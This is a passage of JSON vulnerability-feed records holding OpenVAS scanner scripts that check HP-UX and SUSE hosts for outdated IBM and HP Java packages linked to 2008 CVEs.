revision:\"1.6.0.03.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-PA20W-HS\", revision:\"1.6.0.03.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"HPUX11.23\")\n{\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-COM\", revision:\"1.4.2.21.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-IPF32\", revision:\"1.4.2.21.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-IPF64\", revision:\"1.4.2.21.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-PA11\", revision:\"1.4.2.21.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-PA20\", revision:\"1.4.2.21.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-PA20W\", revision:\"1.4.2.21.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-COM\", revision:\"1.4.2.21.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-IPF32\", revision:\"1.4.2.21.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-IPF32-HS\", revision:\"1.4.2.21.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-IPF64\", revision:\"1.4.2.21.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = 
ishpuxpkgvuln(pkg:\"Jre14.JRE14-IPF64-HS\", revision:\"1.4.2.21.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA11\", revision:\"1.4.2.21.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA11-HS\", revision:\"1.4.2.21.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA20\", revision:\"1.4.2.21.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA20-HS\", revision:\"1.4.2.21.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA20W\", revision:\"1.4.2.21.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA20W-HS\", revision:\"1.4.2.21.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk15.JDK15-COM\", revision:\"1.5.0.15.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk15.JDK15-PA20\", revision:\"1.5.0.15.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk15.JDK15-PA20W\", revision:\"1.5.0.15.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk15.JDK15-IPF32\", revision:\"1.5.0.15.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk15.JDK15-IPF64\", revision:\"1.5.0.15.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-COM\", revision:\"1.5.0.15.00\", 
rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-PA20\", revision:\"1.5.0.15.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-PA20-HS\", revision:\"1.5.0.15.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-PA20W\", revision:\"1.5.0.15.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-PA20W-HS\", revision:\"1.5.0.15.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-IPF32\", revision:\"1.5.0.15.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-IPF32-HS\", revision:\"1.5.0.15.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-IPF64\", revision:\"1.5.0.15.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-IPF64-HS\", revision:\"1.5.0.15.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk60.JDK60-COM\", revision:\"1.6.0.03.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk60.JDK60-PA20\", revision:\"1.6.0.03.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk60.JDK60-PA20W\", revision:\"1.6.0.03.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk60.JDK60-IPF32\", revision:\"1.6.0.03.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n 
exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk60.JDK60-IPF64\", revision:\"1.6.0.03.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-COM\", revision:\"1.6.0.03.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-IPF32\", revision:\"1.6.0.03.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-IPF32-HS\", revision:\"1.6.0.03.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-IPF64\", revision:\"1.6.0.03.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-IPF64-HS\", revision:\"1.6.0.03.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-PA20\", revision:\"1.6.0.03.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-PA20-HS\", revision:\"1.6.0.03.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-PA20W\", revision:\"1.6.0.03.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-PA20W-HS\", revision:\"1.6.0.03.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"HPUX11.11\")\n{\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-COM\", revision:\"1.4.2.21.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-IPF32\", revision:\"1.4.2.21.00\", rls:\"HPUX11.11\")) != NULL)\n {\n 
security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-IPF64\", revision:\"1.4.2.21.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-PA11\", revision:\"1.4.2.21.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-PA20\", revision:\"1.4.2.21.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-PA20W\", revision:\"1.4.2.21.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-COM\", revision:\"1.4.2.21.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-IPF32\", revision:\"1.4.2.21.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-IPF32-HS\", revision:\"1.4.2.21.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-IPF64\", revision:\"1.4.2.21.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-IPF64-HS\", revision:\"1.4.2.21.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA11\", revision:\"1.4.2.21.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA11-HS\", revision:\"1.4.2.21.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA20\", revision:\"1.4.2.21.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = 
ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA20-HS\", revision:\"1.4.2.21.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA20W\", revision:\"1.4.2.21.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA20W-HS\", revision:\"1.4.2.21.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk15.JDK15-COM\", revision:\"1.5.0.15.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk15.JDK15-PA20\", revision:\"1.5.0.15.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk15.JDK15-PA20W\", revision:\"1.5.0.15.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk15.JDK15-IPF32\", revision:\"1.5.0.15.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk15.JDK15-IPF64\", revision:\"1.5.0.15.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-COM\", revision:\"1.5.0.15.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-PA20\", revision:\"1.5.0.15.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-PA20-HS\", revision:\"1.5.0.15.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-PA20W\", revision:\"1.5.0.15.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-PA20W-HS\", revision:\"1.5.0.15.00\", 
rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-IPF32\", revision:\"1.5.0.15.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-IPF32-HS\", revision:\"1.5.0.15.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-IPF64\", revision:\"1.5.0.15.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-IPF64-HS\", revision:\"1.5.0.15.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk60.JDK60-COM\", revision:\"1.6.0.03.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk60.JDK60-PA20\", revision:\"1.6.0.03.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk60.JDK60-PA20W\", revision:\"1.6.0.03.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk60.JDK60-IPF32\", revision:\"1.6.0.03.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk60.JDK60-IPF64\", revision:\"1.6.0.03.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-COM\", revision:\"1.6.0.03.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-IPF32\", revision:\"1.6.0.03.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-IPF32-HS\", revision:\"1.6.0.03.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n 
}\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-IPF64\", revision:\"1.6.0.03.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-IPF64-HS\", revision:\"1.6.0.03.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-PA20\", revision:\"1.6.0.03.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-PA20-HS\", revision:\"1.6.0.03.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-PA20W\", revision:\"1.6.0.03.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-PA20W-HS\", revision:\"1.6.0.03.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-06T11:40:14", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-5344", "CVE-2008-5346", "CVE-2008-5339", "CVE-2008-5341", "CVE-2008-5340", "CVE-2008-5359", "CVE-2008-5343", "CVE-2008-5352", "CVE-2008-5348", "CVE-2008-5357", "CVE-2008-5360", "CVE-2008-5356", "CVE-2008-2086", "CVE-2008-5342", "CVE-2008-5353", "CVE-2008-5350", "CVE-2008-5345", "CVE-2008-5354", "CVE-2008-5351"], "description": "The remote host is missing updates to packages that affect\nthe security of your system. 
One or more of the following packages\nare affected:\n\n java-1_5_0-ibm\n java-1_5_0-ibm-alsa\n java-1_5_0-ibm-devel\n java-1_5_0-ibm-fonts\n java-1_5_0-ibm-jdbc\n java-1_5_0-ibm-plugin\n\n\nMore details may also be found by searching for the SuSE\nEnterprise Server 10 patch database located at\nhttp://download.novell.com/patch/finder/", "modified": "2018-04-06T00:00:00", "published": "2009-10-13T00:00:00", "id": "OPENVAS:136141256231065907", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231065907", "type": "openvas", "title": "SLES10: Security update for IBM Java 1.5.0", "sourceData": "#\n#VID slesp2-java-1_5_0-ibm-5960\n# OpenVAS Vulnerability Test\n# $\n# Description: Security update for IBM Java 1.5.0\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates to packages that affect\nthe security of your system. 
One or more of the following packages\nare affected:\n\n java-1_5_0-ibm\n java-1_5_0-ibm-alsa\n java-1_5_0-ibm-devel\n java-1_5_0-ibm-fonts\n java-1_5_0-ibm-jdbc\n java-1_5_0-ibm-plugin\n\n\nMore details may also be found by searching for the SuSE\nEnterprise Server 10 patch database located at\nhttp://download.novell.com/patch/finder/\";\n\ntag_solution = \"Please install the updates provided by SuSE.\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.65907\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-10-13 18:25:40 +0200 (Tue, 13 Oct 2009)\");\n script_cve_id(\"CVE-2008-5350\", \"CVE-2008-5346\", \"CVE-2008-5343\", \"CVE-2008-5344\", \"CVE-2008-5359\", \"CVE-2008-5341\", \"CVE-2008-5339\", \"CVE-2008-5340\", \"CVE-2008-5348\", \"CVE-2008-2086\", \"CVE-2008-5345\", \"CVE-2008-5351\", \"CVE-2008-5360\", \"CVE-2008-5353\", \"CVE-2008-5356\", \"CVE-2008-5354\", \"CVE-2008-5357\", \"CVE-2008-5352\", \"CVE-2008-5342\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"SLES10: Security update for IBM Java 1.5.0\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. 
http://www.securityspace.com\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse_sles\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"java-1_5_0-ibm\", rpm:\"java-1_5_0-ibm~1.5.0_sr9~2.4\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1_5_0-ibm-alsa\", rpm:\"java-1_5_0-ibm-alsa~1.5.0_sr9~2.4\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1_5_0-ibm-devel\", rpm:\"java-1_5_0-ibm-devel~1.5.0_sr9~2.4\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1_5_0-ibm-fonts\", rpm:\"java-1_5_0-ibm-fonts~1.5.0_sr9~2.4\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1_5_0-ibm-jdbc\", rpm:\"java-1_5_0-ibm-jdbc~1.5.0_sr9~2.4\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1_5_0-ibm-plugin\", rpm:\"java-1_5_0-ibm-plugin~1.5.0_sr9~2.4\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-26T08:56:18", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-5344", "CVE-2008-5346", "CVE-2008-5339", "CVE-2008-5341", "CVE-2008-5340", "CVE-2008-5359", "CVE-2008-5343", "CVE-2008-5352", "CVE-2008-5348", "CVE-2008-5357", "CVE-2008-5360", "CVE-2008-5356", "CVE-2008-2086", "CVE-2008-5342", "CVE-2008-5353", "CVE-2008-5350", "CVE-2008-5345", 
"CVE-2008-5354", "CVE-2008-5351"], "description": "The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n IBMJava5-JRE\n IBMJava5-SDK\n\nFor more information, please visit the referenced security\nadvisories.\n\nMore details may also be found by searching for keyword\n5041763 within the SuSE Enterprise Server 9 patch\ndatabase at http://download.novell.com/patch/finder/", "modified": "2017-07-11T00:00:00", "published": "2009-10-10T00:00:00", "id": "OPENVAS:65489", "href": "http://plugins.openvas.org/nasl.php?oid=65489", "type": "openvas", "title": "SLES9: Security update for IBM Java5 JRE and SDK", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: sles9p5041763.nasl 6666 2017-07-11 13:13:36Z cfischer $\n# Description: Security update for IBM Java5 JRE and SDK\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates to packages that affect\nthe security of your system. 
One or more of the following packages\nare affected:\n\n IBMJava5-JRE\n IBMJava5-SDK\n\nFor more information, please visit the referenced security\nadvisories.\n\nMore details may also be found by searching for keyword\n5041763 within the SuSE Enterprise Server 9 patch\ndatabase at http://download.novell.com/patch/finder/\";\n\ntag_solution = \"Please install the updates provided by SuSE.\";\n \nif(description)\n{\n script_id(65489);\n script_version(\"$Revision: 6666 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-11 15:13:36 +0200 (Tue, 11 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-10-10 16:11:46 +0200 (Sat, 10 Oct 2009)\");\n script_cve_id(\"CVE-2008-5350\", \"CVE-2008-5346\", \"CVE-2008-5343\", \"CVE-2008-5344\", \"CVE-2008-5359\", \"CVE-2008-5341\", \"CVE-2008-5339\", \"CVE-2008-5340\", \"CVE-2008-5348\", \"CVE-2008-2086\", \"CVE-2008-5345\", \"CVE-2008-5351\", \"CVE-2008-5360\", \"CVE-2008-5353\", \"CVE-2008-5356\", \"CVE-2008-5354\", \"CVE-2008-5357\", \"CVE-2008-5352\", \"CVE-2008-5342\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"SLES9: Security update for IBM Java5 JRE and SDK\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. 
http://www.securityspace.com\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse_sles\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"IBMJava5-JRE\", rpm:\"IBMJava5-JRE~1.5.0~0.57\", rls:\"SLES9.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-06T11:40:30", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-5344", "CVE-2008-5346", "CVE-2008-5339", "CVE-2008-5341", "CVE-2008-5340", "CVE-2008-5359", "CVE-2008-5343", "CVE-2008-5352", "CVE-2008-5348", "CVE-2008-5357", 